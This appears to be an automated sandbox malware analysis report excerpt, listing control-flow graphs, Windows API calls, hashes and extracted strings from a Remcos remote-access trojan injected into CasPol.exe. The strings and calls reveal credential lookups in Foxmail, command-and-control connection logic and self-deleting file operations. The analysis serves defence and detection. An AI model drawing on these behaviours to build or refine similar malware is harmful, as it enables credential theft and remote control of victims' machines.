                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Name$ComputerUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4229901323-0
                                                                                                                                                              • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                              • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                              • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                              • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 103->108 109 40d9db call 40697b 103->109 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 189->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 197->203 198->203 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->258 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 258->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 399 40e022-40e025 395->399 400 40e033-40e038 395->400 396->395 401 40e073-40e08e call 401e8f call 41246e 399->401 402 40e027-40e031 399->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 400->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                              • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$PFb$Remcos Agent initialized$Rmc-GH3PRL$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt
                                                                                                                                                              • API String ID: 2830904901-1916676945
                                                                                                                                                              • Opcode ID: 67f9c3a501e064179f98a6bc8ead9cf362d1945a7d78ec30cba1331e76ac5b25
                                                                                                                                                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                              • Opcode Fuzzy Hash: 67f9c3a501e064179f98a6bc8ead9cf362d1945a7d78ec30cba1331e76ac5b25
                                                                                                                                                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 494 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 629 414b54-414b66 call 4047eb call 4020b4 606->629 612 4142ca-4142df call 404915 call 40428c 607->612 613 41429f-4142c5 call 401f66 * 2 call 41a686 607->613 628 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 612->628 612->629 613->629 694 414434-414441 call 40541d 628->694 695 414446-41446d call 401e8f call 412513 628->695 642 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 629->642 643 414b8e-414b96 call 401d8c 629->643 642->643 643->523 694->695 701 414474-4145a8 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 695->701 702 41446f-414471 695->702 737 4145ad-414ac7 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 701->737 702->701 948 414ac9-414ad0 737->948 949 414adb-414ae2 737->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->629
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PFb$Rmc-GH3PRL$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G
                                                                                                                                                              • API String ID: 524882891-2922194489
                                                                                                                                                              • Opcode ID: 06de12a636c4716388b77c6991f9c342f02470d0bb3f6e66dc1e529babb2fb2b
                                                                                                                                                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                                                              • Opcode Fuzzy Hash: 06de12a636c4716388b77c6991f9c342f02470d0bb3f6e66dc1e529babb2fb2b
                                                                                                                                                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b61a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b61a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b61a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1103 412019-412024 Sleep 1101->1103 1104 41200e-412010 1101->1104 1103->1078 1107 41202a-41203c call 408339 1103->1107 1104->1103 1106 412012-412017 1104->1106 1106->1103 1106->1107 1110 412092-4120b1 call 401e13 * 3 1107->1110 1111 41203e-41204c call 408339 1107->1111 1123 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1123 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1122 41205e-41208a Sleep call 401e13 * 3 1117->1122 1122->978 1137 412090 1122->1137 1143 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1123->1143 1144 412274-41236b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1123->1144 1137->1123 1213 41236f-4123db call 401eea call 401e13 call 401eea * 8 1143->1213 1144->1213 1245 4123e0-4123f6 call 401eea 1213->1245
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                                                                              • Opcode ID: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
                                                                                                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                                              • Opcode Fuzzy Hash: 50867f7fd8278ac03888c6cbd25935d2336d67605b6c946f911f9e5deb691de1
                                                                                                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                                              • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                              • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                              • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                              • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                              • Opcode ID: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
                                                                                                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
